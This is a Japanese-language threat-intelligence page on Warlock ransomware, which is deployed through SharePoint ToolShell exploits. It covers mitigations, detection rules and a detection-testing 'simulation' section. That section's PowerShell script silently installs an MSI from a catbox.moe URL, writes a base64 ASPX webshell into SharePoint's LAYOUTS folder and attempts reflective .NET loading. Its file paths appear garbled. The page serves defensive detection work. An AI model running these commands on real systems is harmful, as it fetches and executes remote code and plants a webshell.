SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

ウォーロックランサムウェアが重要な水道および通信インフラを攻撃

Author Photo
SOC Prime Team linkedin icon フォローする
ウォーロックランサムウェアが重要な水道および通信インフラを攻撃
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

ロングレッグスと追跡される中国系の脅威アクターは、Microsoft SharePointの脆弱性を利用してWarlockランサムウェアを展開しています。このグループは、初回アクセスのためにToolShellのエクスプロイトチェーンを使用し、その後侵害されたネットワーク全体を横展開します。攻撃者は、セキュリティソフトを無効にするための脆弱なドライバーの悪用や、ペイロード配信に正規のクラウドサービスを利用するなど、高度な回避技術も適用しています。

調査

調査結果は、最初のSharePointエクスプロイトからLAYOUTSディレクトリ内へのwebshellの展開に至る活動を追跡しました。アナリストは、リモートコード実行に使用される偽のASP.NETマシンキーと、ドメイン全体に配布するためにSYSVOL共有に配置されたランサムウェアを観測しました。攻撃チェーンには、DLLのサイドロードとVisual Studio Codeのトンネリング機能の悪用による永続的なアクセスも含まれていました。

軽減策

組織は、Microsoft SharePoint Serverのパッチを優先して既知のToolShellの脆弱性を修正するべきです。署名済みであっても脆弱なドライバーに厳格な制御を施してBYOVD攻撃を防ぐことが可能です。セキュリティチームは、生存のためのランドツールの異常な使用の監視や、SYSVOL共有への非管理活動のアクセス制限を行い、横展開とランサムウェア展開を減少させるべきです。

対応

悪意のある活動が検出された際には、インシデント対応者は影響を受けたSharePointサーバを隔離し、SYSVOL共有での無許可のスクリプトやバイナリを調査すべきです。ドメインアカウントの包括的な監査を実施し、ローカル管理者グループへの無許可の追加に焦点を当てます。ペイロードのステージングに使用されるcatbox.moeやwasabisys.comなどのファイル共有サービスへの外部接続を確認するためにネットワークトラフィックをレビューします。

攻撃フロー

検出

ローカル管理者へのユーザー追加(コマンドライン経由)

SOC Prime チーム
2026年10月5日

Powershellを介したダウンロードまたはアップロード(コマンドライン経由)

SOC Prime チーム
2026年10月5日

疑わしいPowershell文字列(コマンドライン経由)

SOC Prime チーム
2026年10月5日

Powershellコマンドラインからの疑わしい.NETクラス/メソッドの呼び出し(プロセス作成経由)

SOC Prime チーム
2026年10月5日

ネットワーク共有の探索の可能性(コマンドライン経由)

SOC Prime チーム
2026年10月5日

疑わしいドメイントラストの探索(コマンドライン経由)

SOC Prime チーム
2026年10月5日

遠隔MSIファイルのインストール試行の可能性(コマンドライン経由)

SOC Prime チーム
2026年10月5日

公共ユーザープロファイルからの疑わしい実行(プロセス作成経由)

SOC Prime チーム
2026年10月5日

疑わしいPowershell文字列(powershell経由)

SOC Prime チーム
2026年10月5日

Powershellからの疑わしい.NETメソッドの呼び出し(powershell経由)

SOC Prime チーム
2026年10月5日

Microsoft Exchange / SharePointディレクトリでのWebシェル作成の可能性(ファイルイベント経由)

SOC Prime チーム
2026年10月5日

公共ユーザープロファイルの疑わしいファイル(ファイルイベント経由)

SOC Prime チーム
2026年10月5日

第三者サービス/ツールを介したデータの侵入/流出/C2の可能性(プロキシ経由)

SOC Prime チーム
2026年10月5日

第三者サービス/ツールを介したデータの侵入/流出/C2の可能性(DNS経由)

SOC Prime チーム
2026年10月5日

帯域外相互作用ドメインへのリクエストによる疑わしいコマンド&コントロール(DNS経由)

SOC Prime チーム
2026年10月5日

検出のためのIOC(HashSha256):水と通信事業者を標的とするWarlockランサムウェア攻撃者

SOC Prime AIルール
2026年10月5日

コード実行のための悪意のあるPowerShellコマンドの検出[Windows Powershell]

SOC Prime AIルール
2026年10月5日

Warlockランサムウェアのネットワーク共有経由のステージングと実行[Windowsファイルイベント]

SOC Prime AIルール
2026年10月5日

SharePointサーバー上のWarlockランサムウェアのインジケータ[Windowsプロセス作成]

SOC Prime AIルール
2026年10月5日

シミュレーションの実行

前提条件:テレメトリとベースラインの事前飛行チェックが合格していること。

理論的裏付け:このセクションでは、検出ルールをトリガーするために設計された具体的な攻撃者技術の実行を詳細に説明します。コマンドとナラティブは、特定されたTTPsを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目指す必要があります。抽象的または無関係な例は誤診につながります。

  • 攻撃ナラティブとコマンド: 攻撃者は、SharePointサーバー上にWarlockランサムウェアを展開することを目指しています。攻撃は、次の方法で始まります: msiexec を使用して、リモートの攻撃者制御ドメインから悪意のあるMSIを取得します(catbox.moe)。初期の足がかりを確立した後、攻撃者はPowerShellを使用して、SharePointの layout2sp.aspx パスに悪意のあるASPXウェブシェルをベース64エンコードされたペイロードを使用して書き込むことで、簡単な文字列フィルターを回避します。最後に、攻撃者は、ディスク上にファイルの足跡を残さずにコードを実行するために、 System.Workflow.ComponentModel を使用して悪意のある.NETアセンブリをメモリーに直接ロードすることを試みます。

  • 回帰テストスクリプト:

    # Warlockランサムウェアシミュレーションスクリプト
    # 注意:このスクリプトは承認済みのテスト目的のみに使用します。
    
    Write-Host "[!] Warlockランサムウェアシミュレーションを開始します..." -ForegroundColor Red
    
    # 1. MSIEXECのリモートダウンロードをシミュレート(選択3)
    Write-Host "[*] MSIEXECリモートペイロードダウンロードをシミュレートしています..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. PowerShell ASPXウェブシェルドロップをシミュレート(選択1)
    # 検出を確実にするため、ルールからの正確な文字列を使用
    Write-Host "[*] PowerShellを介したウェブシェルドロップをベース64でシミュレートしています..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. リフレクティブアセンブリロードをシミュレート(選択2)
    Write-Host "[*] リフレクティブアセンブリロードをシミュレートしています..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] シミュレーションコマンドが送信されました。" -ForegroundColor Green
  • クリーンアップコマンド:

    # シミュレーション中に作成されたアーティファクトを削除するクリーンアップスクリプト
    Write-Host "[!] シミュレーションアーティファクトをクリーンアップしています..." -ForegroundColor Yellow
    
    # シミュレートされたファイルを削除(注:実際のテストでは、作成された特定のパスを対象とします)
    # ダミーの文字列を使用したため、主に実際の悪意のあるファイルがドロップされていないことを確認します。
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] クリーンアップ完了。" -ForegroundColor Green